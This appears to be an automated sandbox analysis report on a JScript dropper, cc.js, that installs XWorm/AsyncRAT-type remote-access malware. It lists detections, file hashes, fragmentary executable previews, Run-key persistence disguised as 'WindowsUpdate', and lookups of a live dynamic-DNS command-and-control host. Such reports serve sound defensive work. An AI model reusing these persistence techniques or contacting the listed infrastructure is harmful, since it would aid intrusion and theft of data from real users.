              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: GeUT.exe.0.dr, Program.cs.Net Code: TaskMan
              Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs.Net Code: TaskMan
              Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs.Net Code: TaskMan
              Source: Service.exe.2.dr, Program.cs.Net Code: TaskMan

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information12
              Scripting
              Valid Accounts1
              Native API
              12
              Scripting
              111
              Process Injection
              1
              Masquerading
              OS Credential Dumping1
              Security Software Discovery
              Remote Services11
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              11
              Registry Run Keys / Startup Folder
              11
              Registry Run Keys / Startup Folder
              11
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop Protocol1
              Clipboard Data
              1
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive21
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523189 Sample: cc.js Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 44 as525795.duckdns.org 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 54 9 other signatures 2->54 8 wscript.exe 1 2 2->8         started        12 Service.exe 5 2->12         started        14 Service.exe 2->14         started        16 2 other processes 2->16 signatures3 52 Uses dynamic DNS services 44->52 process4 file5 42 C:\Users\user\AppData\Local\TempbehaviorgrapheUT.exe, PE32 8->42 dropped 64 Benign windows process drops PE files 8->64 66 JScript performs obfuscated calls to suspicious functions 8->66 68 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->68 18 GeUT.exe 2 4 8->18         started        70 Antivirus detection for dropped file 12->70 72 Machine Learning detection for dropped file 12->72 74 Injects a PE file into a foreign processes 12->74 22 Service.exe 12->22         started        24 Service.exe 12->24         started        32 3 other processes 12->32 76 Creates multiple autostart registry keys 14->76 34 5 other processes 14->34 26 GeUT.exe 16->26         started        28 GeUT.exe 16->28         started        30 GeUT.exe 16->30         started        36 7 other processes 16->36 signatures6 process7 file8 40 C:\Users\user\AppData\Roaming\Service.exe, PE32 18->40 dropped 56 Antivirus detection for dropped file 18->56 58 Machine Learning detection for dropped file 18->58 60 Creates multiple autostart registry keys 18->60 62 Injects a PE file into a foreign processes 18->62 38 GeUT.exe 3 18->38         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              cc.js39%ReversingLabsScript-JS.Trojan.Vjw0rm
              cc.js32%VirustotalBrowse
              cc.js100%AviraJS/Dldr.G17
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\GeUT.exe100%AviraTR/Dropper.Gen
              C:\Users\user\AppData\Roaming\Service.exe100%AviraTR/Dropper.Gen
              C:\Users\user\AppData\Local\Temp\GeUT.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Service.exe100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLink
              as525795.duckdns.org2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              as525795.duckdns.org2%VirustotalBrowse
              194.37.97.1501%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              as525795.duckdns.org
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              as525795.duckdns.orgtrueunknown
              194.37.97.150trueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGeUT.exe, 00000003.00000002.3410104953.00000000025D1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://go.micGeUT.exe, 00000008.00000002.2286549047.0000000000914000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                No contacted IP infos
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523189
                Start date and time:2024-10-01 09:16:11 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 19s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:32
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:cc.js
                Detection:MAL
                Classification:mal100.troj.evad.winJS@49/5@3/0
                EGA Information:
                • Successful, ratio: 23.1%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 324
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .js
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target GeUT.exe, PID 2404 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 3172 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 4948 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 4976 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 5004 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 5156 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 5916 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 5968 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 6552 because it is empty
                • Execution Graph export aborted for target GeUT.exe, PID 716 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 1020 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 1088 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 1776 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 2444 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 4080 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 4568 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 4800 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 5144 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 6696 because it is empty
                • Execution Graph export aborted for target Service.exe, PID 6976 because it is empty
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                03:17:07API Interceptor3077799x Sleep call for process: GeUT.exe modified
                09:17:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
                09:17:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe
                09:17:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
                09:17:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe
                No context
                No context
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Roaming\Service.exeORDER-24930-067548.jsGet hashmaliciousStormKitty, XWormBrowse
                  C:\Users\user\AppData\Local\Temp\GeUT.exeORDER-24930-067548.jsGet hashmaliciousStormKitty, XWormBrowse
                    Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):520
                    Entropy (8bit):5.355496254154943
                    Encrypted:false
                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                    MD5:3C255C75EA6EB42410894C0D08A4E324
                    SHA1:34B3512313867B269C545241CD502B960213293A
                    SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                    SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                    Process:C:\Users\user\AppData\Roaming\Service.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):520
                    Entropy (8bit):5.355496254154943
                    Encrypted:false
                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                    MD5:3C255C75EA6EB42410894C0D08A4E324
                    SHA1:34B3512313867B269C545241CD502B960213293A
                    SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                    SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                    Process:C:\Windows\System32\wscript.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):59904
                    Entropy (8bit):7.846014380238068
                    Encrypted:false
                    SSDEEP:1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
                    MD5:7284765CA4D2F85C487796F437B01822
                    SHA1:F1E51F7E021629857369888A16E201FB464B7A61
                    SHA-256:680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
                    SHA-512:17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Joe Sandbox View:
                    • Filename: ORDER-24930-067548.js, Detection: malicious, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..f............................n.... ........@.. .......................@............@................................. ...K.......H.................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B................P.......H........................#..|............................................0..........r...p(....s.......o....t......*..0..........s....&..+.(....,.*..X...2.*..0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(...........*...................*...0..'.......~....rW..po......r...pr...po.....o....*..0..........(....s......(....*"..o....*..0..".......~...
                    Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    File Type:Generic INItialization configuration [WIN]
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):3.6722687970803873
                    Encrypted:false
                    SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                    MD5:DE63D53293EBACE29F3F54832D739D40
                    SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                    SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                    SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                    Malicious:false
                    Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                    Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):59904
                    Entropy (8bit):7.846014380238068
                    Encrypted:false
                    SSDEEP:1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
                    MD5:7284765CA4D2F85C487796F437B01822
                    SHA1:F1E51F7E021629857369888A16E201FB464B7A61
                    SHA-256:680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
                    SHA-512:17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Joe Sandbox View:
                    • Filename: ORDER-24930-067548.js, Detection: malicious, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..f............................n.... ........@.. .......................@............@................................. ...K.......H.................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B................P.......H........................#..|............................................0..........r...p(....s.......o....t......*..0..........s....&..+.(....,.*..X...2.*..0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(...........*...................*...0..'.......~....rW..po......r...pr...po.....o....*..0..........(....s......(....*"..o....*..0..".......~...
                    File type:Unicode text, UTF-16, little-endian text, with very long lines (27355), with CRLF line terminators
                    Entropy (8bit):3.1698323653363847
                    TrID:
                    • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                    • MP3 audio (1001/1) 33.33%
                    File name:cc.js
                    File size:1'729'444 bytes
                    MD5:c63888086e1646654a1e162fde69c0ff
                    SHA1:8580dafbffe4d9b0d7e122127a455682ad2bd30e
                    SHA256:262fb2e45f9b66956236f89f4cbeac22ee3d011832263a28ed7f632a22ae87d7
                    SHA512:df2212775d03605673e6420ef74ec6c99fcdbf7e1dde3287c97c634553f66fd084e0f38549134ec9e0fb8cef4033be92013a430aa7955f0c691f7edff02fcb66
                    SSDEEP:1536:Cz87aBaU8MENpImB8g0fCSjkXCR6cidzXXeF/LeKCO+RiboFN+LQ81fIgOz2ABPA:s87awfM2B85CSQSsXZXSeKGo7BvOiGI
                    TLSH:B885E5FCF5451F2AE392B0599AC8585CB6B2D731F1C9CF141268624AC5DEC2B87C8ED8
                    File Content Preview:.././.C.o.d.e.d. .B.y. .P.j.o.a.o.1.5.7.8.........v.a.r. .w.d.f.f.B.M.d.p.w.u.;.....w.d.f.f.B.M.d.p.w.u. .=. .[.".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.
                    Icon Hash:68d69b8bb6aa9a86
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 1, 2024 09:17:12.894268990 CEST6177653192.168.2.61.1.1.1
                    Oct 1, 2024 09:17:13.893368006 CEST6177653192.168.2.61.1.1.1
                    Oct 1, 2024 09:17:14.909498930 CEST6177653192.168.2.61.1.1.1
                    Oct 1, 2024 09:17:16.903489113 CEST53617761.1.1.1192.168.2.6
                    Oct 1, 2024 09:17:16.903505087 CEST53617761.1.1.1192.168.2.6
                    Oct 1, 2024 09:17:16.903513908 CEST53617761.1.1.1192.168.2.6
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Oct 1, 2024 09:17:12.894268990 CEST192.168.2.61.1.1.10xfc63Standard query (0)as525795.duckdns.orgA (IP address)IN (0x0001)false
                    Oct 1, 2024 09:17:13.893368006 CEST192.168.2.61.1.1.10xfc63Standard query (0)as525795.duckdns.orgA (IP address)IN (0x0001)false
                    Oct 1, 2024 09:17:14.909498930 CEST192.168.2.61.1.1.10xfc63Standard query (0)as525795.duckdns.orgA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Oct 1, 2024 09:17:16.903489113 CEST1.1.1.1192.168.2.60xfc63Server failure (2)as525795.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                    Oct 1, 2024 09:17:16.903505087 CEST1.1.1.1192.168.2.60xfc63Server failure (2)as525795.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                    Oct 1, 2024 09:17:16.903513908 CEST1.1.1.1192.168.2.60xfc63Server failure (2)as525795.duckdns.orgnonenoneA (IP address)IN (0x0001)false

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:03:17:01
                    Start date:01/10/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js"
                    Imagebase:0x7ff74f580000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:03:17:04
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
                    Imagebase:0x410000
                    File size:59'904 bytes
                    MD5 hash:7284765CA4D2F85C487796F437B01822
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:03:17:04
                    Start date:01/10/2024
                    Path:C:\Users\user\AppData\Local\Temp\GeUT.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\GeUT.exe"
